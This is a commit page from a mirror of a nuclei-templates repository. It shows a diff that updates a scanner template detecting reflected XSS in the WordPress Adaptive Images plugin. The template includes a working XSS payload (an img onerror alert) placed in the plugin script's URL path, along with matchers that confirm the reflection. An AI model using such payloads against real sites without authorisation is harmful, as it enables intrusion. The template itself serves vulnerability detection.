daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update wp-adaptive-xss.yaml

patch-1
Prince Chaddha 2022-03-01 02:30:16 +05:30 committed by GitHub
parent 8abb5bf2c0
commit dc6712dbf7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
vulnerabilities/wordpress/wp-adaptive-xss.yaml
View File

@ -5,20 +5,23 @@ info:
author: dhiyaneshDK
severity: medium
description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
reference: https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
tags: wordpress,xss,wp-plugin
reference:
- https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
- https://plugins.trac.wordpress.org/changeset/2655683
tags: wordpress,xss,wp-plugin,wp
requests:
- raw:
- |
GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(%22document.domain%22)%3E/?debug=true HTTP/1.1
Host: {{Hostname}}
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true"
matchers-condition: and
matchers:
- type: word
words:
- '<img/src/onerror=alert("document.domain")>'
- '<img/src/onerror=alert(document.domain)>'
- '<td>Image</td>'
condition: and
- type: word
part: header